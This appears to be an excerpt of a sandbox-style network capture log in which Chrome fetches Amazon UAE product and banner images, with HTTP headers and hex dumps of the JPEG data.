                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 08 08 08 08 08 08 09 0a 0a 09 0c 0d 0c 0d 0c 12 10 0f 0f 10 12 1b 13 15 13 15 13 1b 29 19 1e 19 19 1e 19 29 24 2c 24 21 24 2c 24 41 33 2d 2d 33 41 4b 3f 3c 3f 4b 5b 51 51 5b 72 6c 72 95 95 c9 01 08 08 08 08 08 08 09 0a 0a 09 0c 0d 0c 0d 0c 12 10 0f 0f 10 12 1b 13 15 13 15 13 1b 29 19 1e 19 19 1e 19 29 24 2c 24 21 24 2c 24 41 33 2d 2d 33 41 4b 3f 3c 3f 4b 5b 51 51 5b 72 6c 72 95 95 c9 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 03 04 05 06 02 07 08 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 01 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f5 b4 e9 3c cd 5c a2 81 95 66 9e 5c ad
                                                                                                                                                                                                                                                                      Data Ascii: JFIF))$,$!$,$A3--3AK?<?K[QQ[rlr))$,$!$,$A3--3AK?<?K[QQ[rlrt"5<\f\
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: 07 23 ec 55 4b 1c 53 b0 62 00 f7 40 c0 f6 7a de 7d 11 7f 81 92 60 60 00 a8 16 61 75 68 dc 39 79 4d 19 3e ab 77 38 a3 d4 d1 00 8c 1a 65 2a 48 f2 3d dd ac 72 88 9a 74 12 16 55 db 9e 79 6e 80 fd e7 3b 17 6f e2 61 eb 7c 87 87 b3 66 54 52 cc 40 03 99 27 90 15 0e bf 69 1c ec 44 13 48 17 92 b0 da 01 f9 f3 34 7b 57 6f f0 73 7e 69 fd 68 6b 56 cc e7 f6 12 a2 77 13 86 c7 d3 51 5d db 4e 71 1c aa 4f 87 43 f9 1a 91 37 0a 9f 48 bb be b1 99 21 b8 36 f2 38 c2 be 33 56 76 57 71 76 92 2b 49 21 96 35 b4 df 31 c9 ce e2 46 d0 ec dd fb fe e8 21 41 72 33 8e 40 78 9a c9 62 49 39 27 ef 1f b9 71 37 02 09 25 da 5b 68 ce 3a 66 a4 b2 d6 f5 40 1f 82 bb 4f 35 12 37 0e 31 fa 93 57 fa 35 cd a1 51 7b ad d9 ab 30 25 6d 13 74 6c ff 00 20 43 66 ac f4 d5 96 39 5e 08 60 b9 8c b0 c9 2f c5 0d e1
                                                                                                                                                                                                                                                                      Data Ascii: #UKSb@z}``auh9yM>w8e*H=rtUyn;oa|fTR@'iDH4{Wos~ihkVwQ]NqOC7H!683VvWqv+I!51F!Ar3@xbI9'q7%[h:f@O571W5Q{0%mtl Cf9^`/
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1228INData Raw: 83 7b 00 29 f5 39 18 15 7b bd ca 7a 82 c4 83 5c 6b 5f f2 7f 2a 6f 32 73 ce 3b 66 ff 00 55 15 18 b4 8d b7 24 50 a9 f1 55 02 af 15 af 2c 6e 20 54 dc 0c 32 20 cf 20 db c7 4a d7 3b 55 6c 74 c1 60 d7 f3 5b b8 71 bf 8b 13 33 8d 87 21 4a 86 a9 67 b7 9e ee 37 37 eb 72 88 c1 98 3c 6d 1a 90 0f 30 72 4f 5a b9 d4 f4 db b8 5e 1b 5e cf db 24 ac a5 55 e3 67 62 0b 78 0c 56 98 a4 42 99 1d c3 c9 22 e0 e4 7b 33 57 48 ac 0e 45 49 6f 19 27 91 a3 6d 17 85 79 b4 5e 14 2d 61 fe 1a 4b 68 73 ee d2 41 1e ce 95 75 6b 0b 6e 25 01 c0 3d 68 d9 c1 9f 76 ad 6d 60 46 1b 57 1c ea d5 42 a0 c7 90 8c f2 ae ff 00 bb ff c4 00 31 11 00 02 01 03 02 05 02 04 04 07 00 00 00 00 00 00 01 02 03 00 04 11 05 12 13 21 22 31 41 10 20 06 51 52 91 14 61 71 81 15 32 33 53 72 a1 b1 ff da 00 08 01 02 01 01 3f
                                                                                                                                                                                                                                                                      Data Ascii: {)9{z\k_*o2s;fU$PU,n T2 J;Ult`[q3!Jg77r<m0rOZ^^$UgbxVB"{3WHEIo'my^-aKhsAukn%=hvm`FWB1!"1A QRaq23Sr?


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      131192.168.2.54985418.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC704OUTGET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924057_186x116_1X_en_AE._SY116_CB566513572_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC960INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 4677
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 4ecb2d09-4dd2-4a4c-a9d5-c498efcb3358
                                                                                                                                                                                                                                                                      Date: Fri, 09 Aug 2024 20:35:44 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 09 Aug 2024 13:34:03 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-237,/images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924057_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      Expires: Thu, 04 Aug 2044 20:35:44 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-237 /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924057_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 054609fe51831eb8825d39133f1a4c84.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 190862
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: 2lJUGynaDPgcRTSnB8VfItvUeXSAOA8o03j9nDhtlcxN0Ip6ERDJEw==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC4677INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 06 04 06 06 06 06 08 0d 09 09 08 09 09 10 0c 09 0c 0b 0f 09 0b 0b 0f 0b 0f 0f 0b 0d 0f 0d 0d 11 0f 0d 0d 0f 11 0d 0f 10 17 10 12 10 14 11 10 15 10 17 10 17 16 16 17 19 1a 17 0f 19 23 01 06 06 03 06 06 06 08 06 06 0d 15 0f 09 11 16 12 08 10 1a 16 1a 11 16 17 16 16 10 1d 16 1a 15 16 0d 17 16 11 14 14 11 11 12 10 12 16 11 17 17 17 09 10 17 15 0f 1f 10 11 0f 16 15 19 14 0f 17 1c ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 b4 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 06 07 08 01 04 05 03 09 10 00 01 03 03 01 04 04 08 07 0e 04 07 00 00 00 00 01 00 02 03 04 05 11 06 07 12 21 31 13 22 51 92 14 15 17 41 54 61 81 d1 23 32 33 52 62 71 b2 08 44 53
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#t"!1"QATa#23RbqDS


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      132192.168.2.54985718.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC704OUTGET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924058_186x116_1X_en_AE._SY116_CB566503778_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC960INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 4718
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: f416b5aa-08f7-4ad6-b926-07576effaf5f
                                                                                                                                                                                                                                                                      Date: Fri, 16 Aug 2024 20:00:00 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 09 Aug 2024 20:29:05 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-487,/images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924058_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      Expires: Thu, 11 Aug 2044 20:00:00 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-487 /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742947_3924058_186x116_1X_en_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 52bf0b7935ffde0b5e26a7e27e5fe4ce.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 375051
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: uffOqYpve41zMgdOOzrh7PPevrqIk4WEbi9P4woOfIKfRnKNNzRCLg==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC4718INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 06 04 06 06 06 06 08 0d 09 09 08 09 09 10 0c 09 0c 0b 0f 09 0b 0b 0f 0b 0f 0f 0b 0d 0f 0d 0d 11 0f 0d 0d 0f 11 0d 0f 10 17 10 12 10 14 11 10 15 10 17 10 17 16 16 17 19 1a 17 0f 19 23 01 06 06 03 06 06 06 08 06 06 0d 15 0f 09 11 16 12 08 10 1a 16 1a 11 16 17 16 16 10 1d 16 1a 15 16 0d 17 16 11 14 14 11 11 12 10 12 16 11 17 17 17 09 10 17 15 0f 1f 10 11 0f 16 15 19 14 0f 17 1c ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 ac 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 07 08 03 06 09 04 05 10 00 02 01 03 02 03 04 06 06 05 0b 05 00 00 00 00 01 02 03 00 04 11 05 21 06 12 31 07 13 41 51 08 14 22 61 92 d1 17 23 54 71 81 a1 15 32 62 91 c1 16 24
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#t"!1AQ"a#Tq2b$


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      133192.168.2.549868151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC464OUTGET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Nutrition_186x116_2X_en_AE._SY116_CB566996700_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 4032
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 256bcf06-0375-414f-995b-45599684bb14
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 12 Aug 2024 12:10:26 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Expires: Sun, 07 Aug 2044 12:37:47 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 429997
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:48 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kiad7000112-IAD, cache-nyc-kteb1890048-NYC
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 08 08 08 08 08 08 09 0a 0a 09 0c 0d 0c 0d 0c 12 10 0f 0f 10 12 1b 13 15 13 15 13 1b 29 19 1e 19 19 1e 19 29 24 2c 24 21 24 2c 24 41 33 2d 2d 33 41 4b 3f 3c 3f 4b 5b 51 51 5b 72 6c 72 95 95 c9 01 08 08 08 08 08 08 09 0a 0a 09 0c 0d 0c 0d 0c 12 10 0f 0f 10 12 1b 13 15 13 15 13 1b 29 19 1e 19 19 1e 19 29 24 2c 24 21 24 2c 24 41 33 2d 2d 33 41 4b 3f 3c 3f 4b 5b 51 51 5b 72 6c 72 95 95 c9 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 04 05 06 07 03 02 08 01 00 02 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 02 01 06 03 04 05 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d6 d3 d2 79 9b 79 45 02 ab c6 1d de d5
                                                                                                                                                                                                                                                                      Data Ascii: JFIF))$,$!$,$A3--3AK?<?K[QQ[rlr))$,$!$,$A3--3AK?<?K[QQ[rlrt"5yyE
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: 1b ba b7 76 0a ba e3 c8 21 2c 22 d3 e4 6f b6 e1 69 fe 55 e6 56 61 e0 68 b9 1f 58 3f fa 55 af ca 1c 73 63 a5 d3 1d 7e c4 a0 d4 7c 53 a2 cb 2d bc 6f 31 81 e7 38 8c 4a b8 04 fa 37 0e 5e 44 29 62 05 3b 06 20 0f 34 0c 0f 25 c7 17 0b 17 19 5c 4e cb 81 11 84 0d c7 68 62 8b 57 1a b1 97 24 32 0c fa 31 fc d3 b6 5d 8e 7a c9 35 6d 7e c9 8c b2 ff 00 97 f3 57 3a 82 5d 4b a7 aa a0 2d 0c cb 21 08 49 24 64 13 cb f0 a2 39 fb f9 8f 20 e7 62 ed fa cc 3c 6f 60 f4 79 2d 7f 88 ac 74 08 63 69 d8 19 65 24 45 1f a7 1d 6c 7d 82 ae 78 b3 47 20 dc a6 95 0d e5 d9 4d bd 34 b1 8e 43 d0 2b 5d d4 64 d4 25 67 36 36 f0 fd da e2 81 e7 5a 65 e0 b4 95 5c d9 c5 37 db 19 ad 1f 89 b4 0b b4 88 5e e8 16 d1 c8 84 15 95 63 19 52 3b 41 ab 4d 7a c2 fe ec d9 a4 ca 65 20 b4 27 fe b0 3a d7 d8 c3 e9 8c 28
                                                                                                                                                                                                                                                                      Data Ascii: v!,"oiUVahX?Usc~|S-o18J7^D)b; 4%\NhbW$21]z5m~W:]K-!I$d9 b<o`y-tcie$El}xG M4C+]d%g66Ze\7^cR;AMze ':(
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1276INData Raw: 34 4c 59 77 67 00 1e 5e 23 29 a8 b4 0d 59 4f 2d 51 fd 20 13 71 fb b9 a3 c3 da b4 91 6d 8f 53 99 18 83 cc cb 74 d8 ff 00 50 a9 78 43 5a b8 72 4e bb 3a 6e ec 51 37 ee e2 a3 b3 36 90 47 6c 64 32 b4 08 23 de 7a df 6f 2c 9f 29 a8 21 68 8d 6a 90 5d e8 57 6e a6 49 55 0b 31 47 c9 da 41 34 fa d5 dc 83 0d 3c 8c 3f 0a 6d 52 e7 b2 56 06 bc 25 7a 7f e7 7f 90 a4 d4 ee 3a 9a 53 f9 0a 5d 5a 71 8c 4c e3 dc 05 77 de a5 a8 95 b6 86 69 9d 8f d4 0c 47 e7 8e a1 56 ba fd af 07 d9 d8 db 5e 45 3c a1 e3 03 7c 40 1e 71 fb 18 8a 87 e5 23 87 98 73 ba 9d 7d f6 ad fb 1a 8f e5 37 85 e3 eb bb 98 ff 00 e2 cb 57 3f 2a dc 3c 20 df 0c 57 ef 8e bc 42 00 3f 19 ab 6b be ff 00 82 2b be 89 a2 e9 d1 65 d8 dd 6b bc 67 06 a4 5c 1c f9 39 94 32 1c d6 a7 67 6f 26 77 26 6a e7 41 d2 1c 92 d6 51 12 7b 76
                                                                                                                                                                                                                                                                      Data Ascii: 4LYwg^#)YO-Q qmStPxCZrN:nQ76Gld2#zo,)!hj]WnIU1GA4<?mRV%z:S]ZqLwiGV^E<|@q#s}7W?*< WB?k+ekg\92go&w&jAQ{v


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      134192.168.2.549863151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC610OUTGET /images/I/71QNE71u1BL._AC_SY200_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 4012
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 52a23c58-4748-4bc8-9cc4-41947ccce2dc
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Thu, 26 Sep 2019 21:20:04 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Mon, 26 Oct 2043 05:16:17 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 2433762
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:48 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100160-IAD, cache-nyc-kteb1890069-NYC
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 c8 00 61 03 01 22 00 02 11 01 03 11 01 ff c4 00 98 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 02 01 08 10 00 01 02 04 03 01 0c 03 0c 08 05 05 00 00 00 00 01 02 03 00 04 05 11 06 12 21 31 13 22 41 51 61 71 72 73 a1 b1 b2 b3 14 34 81 16 23 25 33 35 52 62 64 74
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*a"!1"AQaqrs4#%35Rbdt
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: 5a da 8b 45 e2 41 cd d6 5d a5 2b 55 5f 6d b5 d0 da 19 51 40 54 b3 3a 0b 04 b7 cc 35 11 2e 7c f2 d4 c3 83 16 6b d2 20 02 a9 a6 53 a0 3b f7 50 9b 5f 50 78 47 b4 13 0e d1 5f 91 09 2b 53 cd 01 ca e2 05 f8 6d 7b d8 98 5a 9e 90 52 f0 b0 00 2d ed 00 b0 fd 63 1d 25 00 ae 64 58 59 25 66 dc 1b 2f 7b 46 55 17 3f 53 44 e8 2a 94 a9 b2 d2 02 46 66 d4 96 dd 4e a7 43 7b f0 ec b6 b7 8a 8d 56 6e 66 65 a6 f7 3a 93 2e e5 bd 82 17 b9 03 6e 6e 11 b0 10 a0 50 47 0d c8 8d 0d 4d a0 4c bc 8c a0 27 4b a4 68 0e f6 fa 88 41 2c b7 bb 3a 9b 00 3d ef 40 2c 09 55 86 a3 87 53 16 5e 0b 8f 2a a6 07 c4 ed 95 99 47 96 9f 7d 39 9b 50 5a 55 9c a8 d9 5b 0f 09 d4 1d 02 af 71 1a 34 66 12 d2 12 f6 a4 3a 96 90 95 ae 7b 6a 53 63 64 85 2b b4 ed 11 a7 c4 cb b3 1e 90 f8 af e2 a4 be dd 25 e6 a4 44 6e 36
                                                                                                                                                                                                                                                                      Data Ascii: ZEA]+U_mQ@T:5.|k S;P_PxG_+Sm{ZR-c%dXY%f/{FU?SD*FfNC{Vnfe:.nnPGML'KhA,:=@,US^*G}9PZU[q4f:{jScd+%Dn6
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1256INData Raw: 20 82 08 0c e9 dd 6b 53 23 eb 92 9e 43 a6 23 a8 68 f8 02 7c 71 a5 7d a1 06 25 16 3e 1c 7c 7d 72 53 b6 5d d8 65 44 f9 06 70 fd 07 3b 91 1d 35 fe 39 ac f4 2d 64 07 45 3e 4c 3e c3 c6 ec a1 27 81 68 ed 68 18 69 42 1f 07 8e 6f f8 a1 ce 1b f8 a4 74 9b f2 44 4b b6 a6 8d 70 da af 2c df 3b 3e 11 0e 29 4a d6 73 ae 5f 63 ee c3 5c 35 ea ed ff 00 2b b8 c2 f4 a3 be 9c eb 5c f3 dd 85 d9 34 6d 4f 55 d1 30 4f 13 1d f0 9e 24 36 93 ad 1f aa cd 78 04 75 4e 37 6e 63 a2 c7 78 84 71 47 a8 d6 be cb 33 e1 4c 36 69 9b 60 d0 03 78 20 7d 49 8f 2d 71 bd c6 0f 83 95 74 e0 bf b0 31 e0 31 bc 44 cb 46 22 08 20 8c b4 20 82 08 0c fd 63 e1 c9 c3 f5 99 3f ed dc 86 14 14 ff 00 97 e6 79 50 ef e4 11 20 b1 6a e4 e9 e3 98 94 ec 97 72 1a 51 53 6a 03 9d 07 3f 24 74 d4 fc 73 da d3 45 16 a7 23 94 1f
                                                                                                                                                                                                                                                                      Data Ascii: kS#C#h|q}%>|}rS]eDp;59-dE>L>'hhiBotDKp,;>)Js_c\5+\4mOU0O$6xuN7ncxqG3L6i`x }I-qt11DF" c?yP jrQSj?$tsE#


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      135192.168.2.549864151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC610OUTGET /images/I/61yFpBkswxL._AC_SY200_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
